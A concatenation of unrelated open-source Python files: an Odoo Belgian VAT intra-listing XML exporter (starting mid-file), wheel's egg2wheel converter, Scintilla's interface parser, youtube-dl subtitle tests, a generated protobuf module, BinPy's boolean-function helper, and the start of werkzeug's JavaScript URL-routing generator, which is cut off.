GROUP BY p.name, l.partner_id, p.vat, intra_code''', (codes, tuple([p.id for p in wiz_data.period_ids]), data_company.id))
p_count = 0
for row in cr.dictfetchall():
if not row['vat']:
row['vat'] = ''
p_count += 1
seq += 1
amt = row['amount'] or 0.0
amount_sum += amt
intra_code = row['intra_code'] == '44' and 'S' or (row['intra_code'] == '46L' and 'L' or (row['intra_code'] == '46T' and 'T' or ''))
xmldict['clientlist'].append({
'partner_name': row['partner_name'],
'seq': seq,
'vatnum': row['vat'][2:].replace(' ','').upper(),
'vat': row['vat'],
'country': row['vat'][:2],
'amount': round(amt,2),
'intra_code': row['intra_code'],
'code': intra_code})
xmldict.update({'dnum': dnum, 'clientnbr': str(seq), 'amountsum': round(amount_sum,2), 'partner_wo_vat': p_count})
return xmldict
def create_xml(self, cursor, user, ids, context=None):
"""Creates xml that is to be exported and sent to estate for partner vat intra.
:return: Value for next action.
:rtype: dict
"""
mod_obj = self.pool.get('ir.model.data')
xml_data = self._get_datas(cursor, user, ids, context=context)
month_quarter = xml_data['period'][:2]
year = xml_data['period'][2:]
data_file = ''
# Can't we do this by etree?
data_head = """<?xml version="1.0" encoding="ISO-8859-1"?>
<ns2:IntraConsignment xmlns="http://www.minfin.fgov.be/InputCommon" xmlns:ns2="http://www.minfin.fgov.be/IntraConsignment" IntraListingsNbr="1">
<ns2:Representative>
<RepresentativeID identificationType="NVAT" issuedBy="%(issued_by)s">%(vatnum)s</RepresentativeID>
<Name>%(company_name)s</Name>
<Street>%(street)s</Street>
<PostCode>%(post_code)s</PostCode>
<City>%(city)s</City>
<CountryCode>%(country)s</CountryCode>
<EmailAddress>%(email)s</EmailAddress>
<Phone>%(phone)s</Phone>
</ns2:Representative>""" % (xml_data)
if xml_data['mand_id']:
data_head += '\n\t\t<ns2:RepresentativeReference>%(mand_id)s</ns2:RepresentativeReference>' % (xml_data)
data_comp_period = '\n\t\t<ns2:Declarant>\n\t\t\t<VATNumber>%(vatnum)s</VATNumber>\n\t\t\t<Name>%(company_name)s</Name>\n\t\t\t<Street>%(street)s</Street>\n\t\t\t<PostCode>%(post_code)s</PostCode>\n\t\t\t<City>%(city)s</City>\n\t\t\t<CountryCode>%(country)s</CountryCode>\n\t\t\t<EmailAddress>%(email)s</EmailAddress>\n\t\t\t<Phone>%(phone)s</Phone>\n\t\t</ns2:Declarant>' % (xml_data)
if month_quarter.startswith('3'):
data_comp_period += '\n\t\t<ns2:Period>\n\t\t\t<ns2:Quarter>'+month_quarter[1]+'</ns2:Quarter> \n\t\t\t<ns2:Year>'+year+'</ns2:Year>\n\t\t</ns2:Period>'
elif month_quarter.startswith('0') and month_quarter.endswith('0'):
data_comp_period+= '\n\t\t<ns2:Period>\n\t\t\t<ns2:Year>'+year+'</ns2:Year>\n\t\t</ns2:Period>'
else:
data_comp_period += '\n\t\t<ns2:Period>\n\t\t\t<ns2:Month>'+month_quarter+'</ns2:Month> \n\t\t\t<ns2:Year>'+year+'</ns2:Year>\n\t\t</ns2:Period>'
data_clientinfo = ''
for client in xml_data['clientlist']:
if not client['vatnum']:
raise osv.except_osv(_('Insufficient Data!'),_('No vat number defined for %s.') % client['partner_name'])
data_clientinfo +='\n\t\t<ns2:IntraClient SequenceNumber="%(seq)s">\n\t\t\t<ns2:CompanyVATNumber issuedBy="%(country)s">%(vatnum)s</ns2:CompanyVATNumber>\n\t\t\t<ns2:Code>%(code)s</ns2:Code>\n\t\t\t<ns2:Amount>%(amount).2f</ns2:Amount>\n\t\t</ns2:IntraClient>' % (client)
data_decl = '\n\t<ns2:IntraListing SequenceNumber="1" ClientsNbr="%(clientnbr)s" DeclarantReference="%(dnum)s" AmountSum="%(amountsum).2f">' % (xml_data)
data_file += data_head + data_decl + data_comp_period + data_clientinfo + '\n\t\t<ns2:Comment>%(comments)s</ns2:Comment>\n\t</ns2:IntraListing>\n</ns2:IntraConsignment>' % (xml_data)
context = dict(context or {})
context['file_save'] = data_file
model_data_ids = mod_obj.search(cursor, user,[('model','=','ir.ui.view'),('name','=','view_vat_intra_save')], context=context)
resource_id = mod_obj.read(cursor, user, model_data_ids, fields=['res_id'], context=context)[0]['res_id']
return {
'name': _('Save'),
'context': context,
'view_type': 'form',
'view_mode': 'form',
'res_model': 'partner.vat.intra',
'views': [(resource_id,'form')],
'view_id': 'view_vat_intra_save',
'type': 'ir.actions.act_window',
'target': 'new',
}
def preview(self, cr, uid, ids, context=None):
xml_data = self._get_datas(cr, uid, ids, context=context)
datas = {
'ids': [],
'model': 'partner.vat.intra',
'form': xml_data
}
return self.pool['report'].get_action(
cr, uid, [], 'l10n_be.report_l10nvatintraprint', data=datas, context=context
)
class vat_intra_print(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(vat_intra_print, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
})
class wrapped_vat_intra_print(osv.AbstractModel):
_name = 'report.l10n_be.report_l10nvatintraprint'
_inherit = 'report.abstract_report'
_template = 'l10n_be.report_l10nvatintraprint'
_wrapped_report_class = vat_intra_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
zanph/zanph | refs/heads/master | flaskroulette/venv/lib/python2.7/site-packages/wheel/egg2wheel.py | 471 | #!/usr/bin/env python
import os.path
import re
import sys
import tempfile
import zipfile
import wheel.bdist_wheel
import shutil
import distutils.dist
from distutils.archive_util import make_archive
from argparse import ArgumentParser
from glob import iglob
egg_info_re = re.compile(r'''(?P<name>.+?)-(?P<ver>.+?)
(-(?P<pyver>.+?))?(-(?P<arch>.+?))?.egg''', re.VERBOSE)
def egg2wheel(egg_path, dest_dir):
egg_info = egg_info_re.match(os.path.basename(egg_path)).groupdict()
dir = tempfile.mkdtemp(suffix="_e2w")
if os.path.isfile(egg_path):
# assume we have a bdist_egg otherwise
egg = zipfile.ZipFile(egg_path)
egg.extractall(dir)
else:
# support buildout-style installed eggs directories
for pth in os.listdir(egg_path):
src = os.path.join(egg_path, pth)
if os.path.isfile(src):
shutil.copy2(src, dir)
else:
shutil.copytree(src, os.path.join(dir, pth))
dist_info = "%s-%s" % (egg_info['name'], egg_info['ver'])
abi = 'none'
pyver = egg_info['pyver'].replace('.', '')
arch = (egg_info['arch'] or 'any').replace('.', '_').replace('-', '_')
if arch != 'any':
# assume all binary eggs are for CPython
pyver = 'cp' + pyver[2:]
wheel_name = '-'.join((
dist_info,
pyver,
abi,
arch
))
bw = wheel.bdist_wheel.bdist_wheel(distutils.dist.Distribution())
bw.root_is_purelib = egg_info['arch'] is None
dist_info_dir = os.path.join(dir, '%s.dist-info' % dist_info)
bw.egg2dist(os.path.join(dir, 'EGG-INFO'),
dist_info_dir)
bw.write_wheelfile(dist_info_dir, generator='egg2wheel')
bw.write_record(dir, dist_info_dir)
filename = make_archive(os.path.join(dest_dir, wheel_name), 'zip', root_dir=dir)
os.rename(filename, filename[:-3] + 'whl')
shutil.rmtree(dir)
def main():
parser = ArgumentParser()
parser.add_argument('eggs', nargs='*', help="Eggs to convert")
parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
help="Directory to store wheels (default %(default)s)")
parser.add_argument('--verbose', '-v', action='store_true')
args = parser.parse_args()
for pat in args.eggs:
for egg in iglob(pat):
if args.verbose:
sys.stdout.write("{0}... ".format(egg))
egg2wheel(egg, args.dest_dir)
if args.verbose:
sys.stdout.write("OK\n")
if __name__ == "__main__":
main()
|
sanastasiou/notepad-plus-plus | refs/heads/master | scintilla/scripts/Face.py | 56 | # Face.py - module for reading and parsing Scintilla.iface file
# Implemented 2000 by Neil Hodgson neilh@scintilla.org
# Released to the public domain.
# Requires Python 2.5 or later
def sanitiseLine(line):
if line[-1:] == '\n': line = line[:-1]
if line.find("##") != -1:
line = line[:line.find("##")]
line = line.strip()
return line
def decodeFunction(featureVal):
retType, rest = featureVal.split(" ", 1)
nameIdent, params = rest.split("(")
name, value = nameIdent.split("=")
params, rest = params.split(")")
param1, param2 = params.split(",")
return retType, name, value, param1, param2
def decodeEvent(featureVal):
retType, rest = featureVal.split(" ", 1)
nameIdent, params = rest.split("(")
name, value = nameIdent.split("=")
return retType, name, value
def decodeParam(p):
param = p.strip()
type = ""
name = ""
value = ""
if " " in param:
type, nv = param.split(" ")
if "=" in nv:
name, value = nv.split("=")
else:
name = nv
return type, name, value
class Face:
def __init__(self):
self.order = []
self.features = {}
self.values = {}
self.events = {}
def ReadFromFile(self, name):
currentCategory = ""
currentComment = []
currentCommentFinished = 0
file = open(name)
for line in file.readlines():
line = sanitiseLine(line)
if line:
if line[0] == "#":
if line[1] == " ":
if currentCommentFinished:
currentComment = []
currentCommentFinished = 0
currentComment.append(line[2:])
else:
currentCommentFinished = 1
featureType, featureVal = line.split(" ", 1)
if featureType in ["fun", "get", "set"]:
try:
retType, name, value, param1, param2 = decodeFunction(featureVal)
except ValueError:
print("Failed to decode %s" % line)
raise
p1 = decodeParam(param1)
p2 = decodeParam(param2)
self.features[name] = {
"FeatureType": featureType,
"ReturnType": retType,
"Value": value,
"Param1Type": p1[0], "Param1Name": p1[1], "Param1Value": p1[2],
"Param2Type": p2[0], "Param2Name": p2[1], "Param2Value": p2[2],
"Category": currentCategory, "Comment": currentComment
}
if value in self.values:
raise Exception("Duplicate value " + value + " " + name)
self.values[value] = 1
self.order.append(name)
elif featureType == "evt":
retType, name, value = decodeEvent(featureVal)
self.features[name] = {
"FeatureType": featureType,
"ReturnType": retType,
"Value": value,
"Category": currentCategory, "Comment": currentComment
}
if value in self.events:
raise Exception("Duplicate event " + value + " " + name)
self.events[value] = 1
self.order.append(name)
elif featureType == "cat":
currentCategory = featureVal
elif featureType == "val":
try:
name, value = featureVal.split("=", 1)
except ValueError:
print("Failure %s" % featureVal)
raise Exception()
self.features[name] = {
"FeatureType": featureType,
"Category": currentCategory,
"Value": value }
self.order.append(name)
elif featureType == "enu" or featureType == "lex":
name, value = featureVal.split("=", 1)
self.features[name] = {
"FeatureType": featureType,
"Category": currentCategory,
"Value": value }
self.order.append(name)
|
linglung/ytdl | refs/heads/master | test/test_subtitles.py | 21 | #!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import FakeYDL, md5
from youtube_dl.extractor import (
YoutubeIE,
DailymotionIE,
TEDIE,
VimeoIE,
WallaIE,
CeskaTelevizeIE,
LyndaIE,
NPOIE,
ComedyCentralIE,
NRKTVIE,
RaiTVIE,
VikiIE,
ThePlatformIE,
ThePlatformFeedIE,
RTVEALaCartaIE,
FunnyOrDieIE,
DemocracynowIE,
)
class BaseTestSubtitles(unittest.TestCase):
url = None
IE = None
def setUp(self):
self.DL = FakeYDL()
self.ie = self.IE()
self.DL.add_info_extractor(self.ie)
def getInfoDict(self):
info_dict = self.DL.extract_info(self.url, download=False)
return info_dict
def getSubtitles(self):
info_dict = self.getInfoDict()
subtitles = info_dict['requested_subtitles']
if not subtitles:
return subtitles
for sub_info in subtitles.values():
if sub_info.get('data') is None:
uf = self.DL.urlopen(sub_info['url'])
sub_info['data'] = uf.read().decode('utf-8')
return dict((l, sub_info['data']) for l, sub_info in subtitles.items())
class TestYoutubeSubtitles(BaseTestSubtitles):
url = 'QRS8MkLhQmM'
IE = YoutubeIE
def test_youtube_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(len(subtitles.keys()), 13)
self.assertEqual(md5(subtitles['en']), '3cb210999d3e021bd6c7f0ea751eab06')
self.assertEqual(md5(subtitles['it']), '6d752b98c31f1cf8d597050c7a2cb4b5')
for lang in ['fr', 'de']:
self.assertTrue(subtitles.get(lang) is not None, 'Subtitles for \'%s\' not extracted' % lang)
def test_youtube_subtitles_ttml_format(self):
self.DL.params['writesubtitles'] = True
self.DL.params['subtitlesformat'] = 'ttml'
subtitles = self.getSubtitles()
self.assertEqual(md5(subtitles['en']), 'e306f8c42842f723447d9f63ad65df54')
def test_youtube_subtitles_vtt_format(self):
self.DL.params['writesubtitles'] = True
self.DL.params['subtitlesformat'] = 'vtt'
subtitles = self.getSubtitles()
self.assertEqual(md5(subtitles['en']), '3cb210999d3e021bd6c7f0ea751eab06')
def test_youtube_automatic_captions(self):
self.url = '8YoUxe5ncPo'
self.DL.params['writeautomaticsub'] = True
self.DL.params['subtitleslangs'] = ['it']
subtitles = self.getSubtitles()
self.assertTrue(subtitles['it'] is not None)
def test_youtube_translated_subtitles(self):
# This video has a subtitles track, which can be translated
self.url = 'Ky9eprVWzlI'
self.DL.params['writeautomaticsub'] = True
self.DL.params['subtitleslangs'] = ['it']
subtitles = self.getSubtitles()
self.assertTrue(subtitles['it'] is not None)
def test_youtube_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'n5BB19UTcdA'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestDailymotionSubtitles(BaseTestSubtitles):
url = 'http://www.dailymotion.com/video/xczg00'
IE = DailymotionIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertTrue(len(subtitles.keys()) >= 6)
self.assertEqual(md5(subtitles['en']), '976553874490cba125086bbfea3ff76f')
self.assertEqual(md5(subtitles['fr']), '594564ec7d588942e384e920e5341792')
for lang in ['es', 'fr', 'de']:
self.assertTrue(subtitles.get(lang) is not None, 'Subtitles for \'%s\' not extracted' % lang)
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://www.dailymotion.com/video/x12u166_le-zapping-tele-star-du-08-aout-2013_tv'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestTedSubtitles(BaseTestSubtitles):
url = 'http://www.ted.com/talks/dan_dennett_on_our_consciousness.html'
IE = TEDIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertTrue(len(subtitles.keys()) >= 28)
self.assertEqual(md5(subtitles['en']), '4262c1665ff928a2dada178f62cb8d14')
self.assertEqual(md5(subtitles['fr']), '66a63f7f42c97a50f8c0e90bc7797bb5')
for lang in ['es', 'fr', 'de']:
self.assertTrue(subtitles.get(lang) is not None, 'Subtitles for \'%s\' not extracted' % lang)
class TestVimeoSubtitles(BaseTestSubtitles):
url = 'http://vimeo.com/76979871'
IE = VimeoIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['de', 'en', 'es', 'fr']))
self.assertEqual(md5(subtitles['en']), '8062383cf4dec168fc40a088aa6d5888')
self.assertEqual(md5(subtitles['fr']), 'b6191146a6c5d3a452244d853fde6dc8')
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://vimeo.com/56015672'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestWallaSubtitles(BaseTestSubtitles):
url = 'http://vod.walla.co.il/movie/2705958/the-yes-men'
IE = WallaIE
def test_allsubtitles(self):
self.DL.expect_warning('Automatic Captions not supported by this server')
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['heb']))
self.assertEqual(md5(subtitles['heb']), 'e758c5d7cb982f6bef14f377ec7a3920')
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://vod.walla.co.il/movie/2642630/one-direction-all-for-one'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestCeskaTelevizeSubtitles(BaseTestSubtitles):
url = 'http://www.ceskatelevize.cz/ivysilani/10600540290-u6-uzasny-svet-techniky'
IE = CeskaTelevizeIE
def test_allsubtitles(self):
self.DL.expect_warning('Automatic Captions not supported by this server')
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['cs']))
self.assertTrue(len(subtitles['cs']) > 20000)
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://www.ceskatelevize.cz/ivysilani/ivysilani/10441294653-hyde-park-civilizace/214411058091220'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestLyndaSubtitles(BaseTestSubtitles):
url = 'http://www.lynda.com/Bootstrap-tutorials/Using-exercise-files/110885/114408-4.html'
IE = LyndaIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '09bbe67222259bed60deaa26997d73a7')
class TestNPOSubtitles(BaseTestSubtitles):
url = 'http://www.npo.nl/nos-journaal/28-08-2014/POW_00722860'
IE = NPOIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['nl']))
self.assertEqual(md5(subtitles['nl']), 'fc6435027572b63fb4ab143abd5ad3f4')
class TestMTVSubtitles(BaseTestSubtitles):
url = 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother'
IE = ComedyCentralIE
def getInfoDict(self):
return super(TestMTVSubtitles, self).getInfoDict()['entries'][0]
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'b9f6ca22a6acf597ec76f61749765e65')
class TestNRKSubtitles(BaseTestSubtitles):
url = 'http://tv.nrk.no/serie/ikke-gjoer-dette-hjemme/DMPV73000411/sesong-2/episode-1'
IE = NRKTVIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['no']))
self.assertEqual(md5(subtitles['no']), '544fa917d3197fcbee64634559221cc2')
class TestRaiSubtitles(BaseTestSubtitles):
url = 'http://www.rai.tv/dl/RaiTV/programmi/media/ContentItem-cb27157f-9dd0-4aee-b788-b1f67643a391.html'
IE = RaiTVIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['it']))
self.assertEqual(md5(subtitles['it']), 'b1d90a98755126b61e667567a1f6680a')
class TestVikiSubtitles(BaseTestSubtitles):
url = 'http://www.viki.com/videos/1060846v-punch-episode-18'
IE = VikiIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '53cb083a5914b2d84ef1ab67b880d18a')
class TestThePlatformSubtitles(BaseTestSubtitles):
# from http://www.3playmedia.com/services-features/tools/integrations/theplatform/
# (see http://theplatform.com/about/partners/type/subtitles-closed-captioning/)
url = 'theplatform:JFUjUE1_ehvq'
IE = ThePlatformIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '97e7670cbae3c4d26ae8bcc7fdd78d4b')
class TestThePlatformFeedSubtitles(BaseTestSubtitles):
url = 'http://feed.theplatform.com/f/7wvmTC/msnbc_video-p-test?form=json&pretty=true&range=-40&byGuid=n_hardball_5biden_140207'
IE = ThePlatformFeedIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '48649a22e82b2da21c9a67a395eedade')
class TestRtveSubtitles(BaseTestSubtitles):
url = 'http://www.rtve.es/alacarta/videos/los-misterios-de-laura/misterios-laura-capitulo-32-misterio-del-numero-17-2-parte/2428621/'
IE = RTVEALaCartaIE
def test_allsubtitles(self):
print('Skipping, only available from Spain')
return
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['es']))
self.assertEqual(md5(subtitles['es']), '69e70cae2d40574fb7316f31d6eb7fca')
class TestFunnyOrDieSubtitles(BaseTestSubtitles):
url = 'http://www.funnyordie.com/videos/224829ff6d/judd-apatow-will-direct-your-vine'
IE = FunnyOrDieIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'c5593c193eacd353596c11c2d4f9ecc4')
class TestDemocracynowSubtitles(BaseTestSubtitles):
url = 'http://www.democracynow.org/shows/2015/7/3'
IE = DemocracynowIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'acaca989e24a9e45a6719c9b3d60815c')
def test_subtitles_in_page(self):
self.url = 'http://www.democracynow.org/2015/7/3/this_flag_comes_down_today_bree'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'acaca989e24a9e45a6719c9b3d60815c')
if __name__ == '__main__':
unittest.main()
|
earshel/PokeyPySnipe | refs/heads/master | POGOProtos/Data/Player/PlayerCamera_pb2.py | 16 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Data/Player/PlayerCamera.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Data/Player/PlayerCamera.proto',
package='POGOProtos.Data.Player',
syntax='proto3',
serialized_pb=_b('\n)POGOProtos/Data/Player/PlayerCamera.proto\x12\x16POGOProtos.Data.Player\")\n\x0cPlayerCamera\x12\x19\n\x11is_default_camera\x18\x01 \x01(\x08\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PLAYERCAMERA = _descriptor.Descriptor(
name='PlayerCamera',
full_name='POGOProtos.Data.Player.PlayerCamera',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='is_default_camera', full_name='POGOProtos.Data.Player.PlayerCamera.is_default_camera', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=69,
serialized_end=110,
)
DESCRIPTOR.message_types_by_name['PlayerCamera'] = _PLAYERCAMERA
PlayerCamera = _reflection.GeneratedProtocolMessageType('PlayerCamera', (_message.Message,), dict(
DESCRIPTOR = _PLAYERCAMERA,
__module__ = 'POGOProtos.Data.Player.PlayerCamera_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Player.PlayerCamera)
))
_sym_db.RegisterMessage(PlayerCamera)
# @@protoc_insertion_point(module_scope)
|
rajathkumarmp/BinPy | refs/heads/develop | BinPy/algorithms/makebooleanfunction.py | 5 | from BinPy.algorithms.ExpressionConvert import *
from BinPy.algorithms.QuineMcCluskey import *
import sys
def make_boolean(vars, min_max, dont_care=None, **kwargs):
"""
A function which takes in minterms/maxterms and
returns the Boolean Function and implementable form
Don't Care Conditions can also be provided (optional)
Examples
========
>>> from BinPy import *
>>> le, gf = make_boolean(['A', 'B', 'C'], [1, 4, 7], minterms=True)
>>> le
'((A AND (NOT B) AND (NOT C)) OR (A AND B AND C) OR ((NOT A) AND (NOT B) AND C))'
>>> gf
'OR(AND(A, NOT(B), NOT(C)), AND(A, B, C), AND(NOT(A), NOT(B), C))'
"""
ones = []
while(True):
if 'minterms' in kwargs:
if kwargs['minterms'] is True:
ones = min_max
if ones[-1] >= pow(2, len(vars)):
raise Exception("Error: Invalid minterms")
break
elif 'maxterms' in kwargs:
if kwargs['maxterms'] is True:
zeros = min_max
if zeros[-1] >= pow(2, len(vars)):
raise Exception("Error: Invalid maxterms")
for i in range(pow(2, len(vars))):
if i not in zeros:
ones.append(i)
break
if dont_care is not None:
_dont_care = list(map(int, dont_care))
qm = QM(vars)
if dont_care is not None:
LogicalExpression = qm.get_function(qm.solve(ones, _dont_care)[1])
else:
LogicalExpression = qm.get_function(qm.solve(ones)[1])
GateForm = convertExpression(LogicalExpression)
return LogicalExpression, GateForm
|
eivantsov/flask | refs/heads/master | lib/werkzeug/contrib/jsrouting.py | 318 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.jsrouting
~~~~~~~~~~~~~~~~~~~~~~~~~~
Addon module that allows to create a JavaScript function from a map
that generates rules.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
from simplejson import dumps
except ImportError:
try:
from json import dumps
except ImportError:
def dumps(*args):
raise RuntimeError('simplejson required for jsrouting')
from inspect import getmro
from werkzeug.routing import NumberConverter
from werkzeug._compat import iteritems
def render_template(name_parts, rules, converters):
result = u''
if name_parts:
for idx in xrange(0, len(name_parts) - 1):
name = u'.'.join(name_parts[:idx + 1])
result += u"if (typeof %s === 'undefined') %s = {}\n" % (name, name)
result += '%s = ' % '.'.join(name_parts)
result += """(function (server_name, script_name, subdomain, url_scheme) {
var converters = %(converters)s;
var rules = $rules;
function in_array(array, value) {
if (array.indexOf != undefined) {
return array.indexOf(value) != -1;
}
for (var i = 0; i < array.length; i++) {
if (array[i] == value) {
return true;
}
}
return false;
}
function array_diff(array1, array2) {
array1 = array1.slice();
for (var i = array1.length-1; i >= 0; i--) {
if (in_array(array2, array1[i])) {
array1.splice(i, 1);
}
}
return array1;
}
function split_obj(obj) {
var names = [];
var values = [];
for (var name in obj) {
if (typeof(obj[name]) != 'function') {
names.push(name);
values.push(obj[name]);
}
}
return {names: names, values: values, original: obj};
}
function suitable(rule, args) {
var default_args = split_obj(rule.defaults || {});
var diff_arg_names = array_diff(rule.arguments, default_args.names);
for (var i = 0; i < diff_arg_names.length; i++) {
if (!in_array(args.names, diff_arg_names[i])) {
return false;
}
}
if (array_diff(rule.arguments, args.names).length == 0) {
if (rule.defaults == null) {
return true;
}
for (var i = 0; i < default_args.names.length; i++) {
var key = default_args.names[i];
var value = default_args.values[i];
if (value != args.original[key]) {
return false;
}
}
}
return true;
}
function build(rule, args) {
var tmp = [];
var processed = rule.arguments.slice();
for (var i = 0; i < rule.trace.length; i++) {
var part = rule.trace[i];
if (part.is_dynamic) {
var converter = converters[rule.converters[part.data]];
var data = converter(args.original[part.data]);
if (data == null) {
return null;
}
tmp.push(data);
processed.push(part.name);
} else {
tmp.push(part.data);
}
}
tmp = tmp.join('');
var pipe = tmp.indexOf('|');
var subdomain = tmp.substring(0, pipe);
var url = tmp.substring(pipe+1);
var unprocessed = array_diff(args.names, processed);
var first_query_var = true;
for (var i = 0; i < unprocessed.length; i++) {
if (first_query_var) {
url += '?';
} else {
url += '&';
}
first_query_var = false;
url += encodeURIComponent(unprocessed[i]);
url += '=';
url += encodeURIComponent(args.original[unprocessed[i]]);
}
return {subdomain: subdomain, path: url};
}
function lstrip(s, c) {
while (s && s.substring(0, 1) == c) {
s = s.substring(1);
}
return s;
}
function rstrip(s, c) {
while (s && s.substring(s.length-1, s.length) == c) {
s = s.substring(0, s.length-1);
}
return s;
}
return function(endpoint, args, force_external) {
args = split_obj(args);
var rv = null;
for (var i = 0; i < rules.length; i++) {
var rule = rules[i];
if (rule.endpoint != endpoint) continue;
if (suitable(rule, args)) {
rv = build(rule, args);
if (rv != null) {
break;
}
}
}
if (rv == null) {
return null;
}
if (!force_external && rv.subdomain == subdomain) {
return rstrip(script_name, '/') + '/' + lstrip(rv.path, '/');
} else {
return url_scheme + '://'
+ (rv.subdomain ? rv.subdomain + '.' : '')
+ server_name + rstrip(script_name, '/')
+ '/' + lstrip(rv.path, '/');
}
};
})""" % {'converters': u', '.join(converters)}
return result
def generate_map(map, name='url_map'):
"""
Generates a JavaScript function containing the rules defined in
this map, to be used with a MapAdapter's generate_javascript
method. If you don't pass a name the returned JavaScript code is
an expression that returns a function. Otherwise it's a standalone
script that assigns the function with that name. Dotted names are
resolved (so you an use a name like 'obj.url_for')
In order to use JavaScript generation, simplejson must be installed.
Note that using this feature will expose the rules
defined in your map to users. If your rules contain sensitive
information, don't use JavaScript generation!
"""
from warnings import warn
warn(DeprecationWarning('This module is deprecated'))
map.update()
rules = []
converters = []
for rule in map.iter_rules():
trace = [{
'is_dynamic': is_dynamic,
'data': data
